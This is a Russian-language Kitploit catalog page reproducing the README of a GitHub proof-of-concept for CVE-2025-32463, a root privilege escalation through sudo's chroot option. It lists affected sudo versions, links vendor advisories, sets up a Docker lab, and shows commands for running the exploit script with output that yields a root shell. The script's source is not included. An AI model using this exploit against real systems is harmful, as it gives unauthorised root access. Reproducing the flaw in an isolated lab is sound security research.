Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32463_chwoot — Эскалация привилегий до root через бинарный файл sudo с опцией chroot. CVE-2025-32463 | Kitploit
Инструменты/GitHubGitHub/pr0v3rbs/cve-2025-32463_chwoot
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingПобег из Контейнера
GitHubpr0v3rbs/cve-2025-32463_chwoot

CVE-2025-32463_chwoot

Эскалация привилегий до root через бинарный файл sudo с опцией chroot. CVE-2025-32463

Репозиторий
52595129 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-32463 – sudo chroot («chwoot») PoC

Этот репозиторий предоставляет минимальную воспроизводимую среду для демонстрации уязвимости повышения привилегий CVE‑2025‑32463 в функции chroot в sudo.

  • Эта уязвимость сообщена Ричем Мирчем (@0xm1rch в X) @ Stratascale.
  • Оригинальная публикация: Vulnerability Advisory: Sudo chroot Elevation of Privilege
  • NVD: CVE-2025-32463 (CVSS 9.3)

Затронутые версии

Уязвимые сборки sudo 1.9.14 вплоть до 1.9.17 (все p‑revisions) на большинстве дистрибутивов Linux подвержены уязвимости.

Страницы безопасности

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

Содержимое

ФайлНазначение
DockerfileСоздаёт образ Ubuntu 24.04 с уязвимым sudo 1.9.16p2 и инструментами сборки
sudo‑chwoot.shЭксплойт Proof‑of‑Concept, открывающий root-оболочку внутри chroot
run.sh

Быстрая проверка уязвимости

root@kitploit:~
# Уязвимый sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Исправленный sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot

Тестирование эксплойта в Docker-контейнере

root@kitploit:~
# 1 – клонируем репозиторий
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – собираем и запускаем Docker-образ (с тегом "sudo-chwoot")
$ ./run.sh

# 3 – запускаем эксплойт в контейнере (выполняет команду от root или открывает root-оболочку)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#

run.sh передаёт Docker параметры --privileged и --rm, чтобы контейнер автоматически удалялся при выходе.


Очистка

Удалите образ, когда закончите:

root@kitploit:~
docker rmi sudo-chwoot

Ссылки

  • Уведомление об уязвимости от Stratascale CRU: Vulnerability Advisory: Sudo chroot Elevation of Privilege
Скачать инструмент
Вспомогательный скрипт, собирающий образ (при необходимости) и запускающий контейнер с эксплойтом